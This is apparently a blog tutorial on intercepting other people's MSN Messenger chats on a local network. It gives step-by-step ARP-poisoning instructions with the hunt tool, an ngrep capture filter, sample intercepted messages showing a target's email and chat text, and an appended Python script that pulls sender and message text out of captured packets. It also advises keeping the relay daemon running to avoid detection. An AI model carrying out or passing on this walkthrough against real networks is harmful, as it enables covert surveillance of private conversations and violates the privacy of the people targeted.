Howto eavesdrop on MSN Conversations
This is another post in the ‘fun with ARP’ series I’ve started. I will show you how you can eavesdrop on the MSN conversations of your friends and enemies. This is an ARP attack, so it only works against targets on the same LAN segment as you; it also relies on MSN Messenger sending its chat messages in clear text, which is what makes the captured packets readable. I described in the “Howto hack the computers in your LAN” post how you can use ARP poisoning/spoofing to route all traffic on a switched network through your computer. We are going to use the same technique here, with some adjustments.
This is what we want to do:
- Eavesdrop on a user’s MSN conversations
This is how we’re going to do it:
- Poison the ARP tables of the target and the default gateway so that all traffic between them goes through us
- Filter out the packets that contain the MSN messages
1. Poison the ARP tables of the target and the default gateway
There are tons of tools you can use to poison ARP tables, but I’m going to use a tool called hunt, which is really simple and powerful. Read my “Howto hack the computers in your LAN” post for instructions on how to get it.
Fire up hunt:
sudo ./hunt
In the menu system, go to:
d) daemons rst/arp/sniff/mac
a) arp spoof + arp relayer daemon
a) insert single/range arp spoof
s/k) start/stop relayer daemon (press s)
You will be asked for the IP and MAC address of host1 and host2. Use these values:
host1: IP address of the target
mac: YOUR MAC address
host2: IP address of the gateway
mac: YOUR MAC address
You can find your MAC address by running ifconfig.
Congratulations, now all traffic between the target and the gateway goes through you. You can check it from the target with arp -a: the entry for the gateway should now show your MAC address. Leave the relayer daemon running for as long as you are sniffing; it is what forwards the redirected packets on to their real destination, and without it the target simply loses its network connection, which is a good way to get noticed.
2. Filter out the packets that contain the MSN messages
If you try to look at everything an active desktop PC is sending and receiving, you will go crazy within a few minutes. That’s why we need a packet filter. I based my filter on the program ngrep, which is a simple yet powerful packet sniffer: it captures packets like tcpdump does, but matches a regular expression against each packet’s payload and prints only the packets that match. The filter I designed is very simple, and I bet most of you could throw something much more effective together in a few minutes. (If you do, why not post it in the comments?) If you don’t have ngrep installed, do a
sudo apt-get install ngrep
(Debian/Ubuntu)
The filter I used:
sudo ngrep '^MSG.{0,}Content-Type: text/plain.{0,}$'
This matches every packet whose payload starts with ‘MSG’ and contains ‘Content-Type: text/plain’ somewhere after it (.{0,} is just a long way of writing .*). MSN Messenger’s chat traffic runs over TCP port 1863, as the addresses in the output below show, so if you get matches on other kinds of traffic you can either tighten the regex or restrict the capture by adding a BPF expression after the pattern, e.g. port 1863. The text/plain match also drops the MSG packets that are not chat text, such as typing notifications (Content-Type: text/x-msmsgscontrol). Check out the ngrep man page and http://www.regular-expressions.info/ for more info.
The output should look something like this (the dots are how ngrep prints non-printable bytes, here the CR/LF pairs that end each line of the message):
Outgoing message:
T 10.0.0.88:1148 -> 207.46.26.169:1863 [AP]
MSG 38 N 141..MIME-Version: 1.0..Content-Type: text/plain; charset=UTF-8..X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=0; CS=0; PF=22….Hello my friend! How do you do?
Incoming message:
T 207.46.26.169:1863 -> 10.0.0.88:1148 [AP]
MSG targets.email-address@mail.com Target-nickname 135..MIME-Version: 1.0..Content-Type: text/plain; charset=UTF-8..X-MMS-IM-Format: FN=MS%20Shell%20Dlg; EF=; CO=0; CS=0; PF=0….Not so good, my girlfriend kicked me in the nuts
If you want, you can pipe the output to a Perl/PHP/bash script and strip everything but the nick and the message, but that’s grunt work I’ll leave to you!
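To show what such a script actually has to do, here is an added Python example of my own (not code from the post). It works on raw TCP payload bytes, the form a pcap or your own sniffer hands you, rather than on ngrep’s dotted text, and it uses only the MSG framing visible in the capture above: a command line MSG a b length, then exactly length bytes of MIME headers, a blank line and the body. All function names, the two segments it parses and the example.com addresses are constructed for the example; the sample text is modelled on the output above.

```python
"""Pull chat text out of MSN Messenger (MSNP) switchboard traffic.

Added example, not code from the post. Input is the raw TCP payload
(from a pcap or your own sniffer), not ngrep's dotted output. Framing
used: 'MSG <a> <b> <len>\\r\\n' followed by exactly <len> bytes of MIME
headers, a blank line and the message body.
"""
from urllib.parse import unquote

# Ack-type flags a client may put in the second field of an outgoing MSG.
ACK_FLAGS = {"N", "A", "U", "D"}


def build_msg(first_two_fields, headers, body):
    """Constructed test payload builder (not a real client): frame one MSG."""
    mime = (headers + "\r\n\r\n" + body).encode("utf-8")
    return f"MSG {first_two_fields} {len(mime)}\r\n".encode("ascii") + mime


def split_commands(stream):
    """Split one TCP payload into (fields, payload) pairs.

    Several commands may share a segment. MSG is length-prefixed; every
    other command is a single line. A MSG whose body is not fully present
    ends the parse, since the rest arrives in the next segment.
    """
    commands, pos = [], 0
    while pos < len(stream):
        eol = stream.find(b"\r\n", pos)
        if eol == -1:
            break  # incomplete command line
        fields = stream[pos:eol].decode("utf-8", "replace").split(" ")
        pos = eol + 2
        if fields[0] == "MSG" and len(fields) == 4 and fields[3].isdigit():
            length = int(fields[3])
            if pos + length > len(stream):
                break  # truncated MSG body
            commands.append((fields, stream[pos:pos + length]))
            pos += length
        else:
            commands.append((fields, b""))
    return commands


def parse_msg(fields, payload):
    """Return {'direction', 'sender', 'text'} for a text/plain MSG, else None.

    The Content-Type test is the same selection the ngrep filter makes:
    typing notifications (text/x-msmsgscontrol) and other non-chat MSGs
    are dropped.
    """
    head, _, body = payload.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("utf-8", "replace").split("\r\n"):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get("content-type", "").startswith("text/plain"):
        return None
    if fields[1].isdigit() and fields[2] in ACK_FLAGS:
        # client -> switchboard: MSG TrID AckType Length (no sender field)
        direction, sender = "outgoing", "me"
    else:
        # switchboard -> client: MSG Email Nickname Length (nick URL-encoded)
        direction, sender = "incoming", f"{unquote(fields[2])} <{fields[1]}>"
    return {"direction": direction, "sender": sender,
            "text": body.decode("utf-8", "replace")}


def extract_chat(stream):
    """Chat lines from one TCP payload, in order; non-chat commands skipped."""
    chat = []
    for fields, payload in split_commands(stream):
        if fields[0] == "MSG":
            msg = parse_msg(fields, payload)
            if msg is not None:
                chat.append(msg)
    return chat


# Constructed samples modelled on the ngrep output in the post (addresses invented).
TEXT_HEADERS = ("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n"
                "X-MMS-IM-Format: FN=MS%20Shell%20Dlg; EF=; CO=0; CS=0; PF=0")
OUTGOING = build_msg("38 N", TEXT_HEADERS, "Hello my friend! How do you do?")
TYPING = build_msg("39 U", "MIME-Version: 1.0\r\nContent-Type: text/x-msmsgscontrol\r\n"
                   "TypingUser: me@example.com", "")
INCOMING = (b"QNG 50\r\n"  # keepalive reply sharing the segment with a MSG
            + build_msg("friend@example.com Target%20nickname", TEXT_HEADERS,
                        "Not so good, my girlfriend kicked me in the nuts"))

if __name__ == "__main__":
    # third segment is deliberately cut short: nothing is printed for it
    for segment in (OUTGOING + TYPING, INCOMING, OUTGOING[:-5]):
        for m in extract_chat(segment):
            print(f"[{m['direction']}] {m['sender']}: {m['text']}")
```

The length prefix is what makes this robust: it lets the parser skip the typing notification and the QNG line that share a segment with a real message, and refuse a MSG whose body was split across two TCP segments instead of printing half a line. If you do want to feed it ngrep’s text output instead, map the dots back to CR/LF first.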
It is actually that simple!
More information on ARP spoofing can be found at
http://www.watchguard.com/infocenter/editorial/135324.asp
Happy hacking!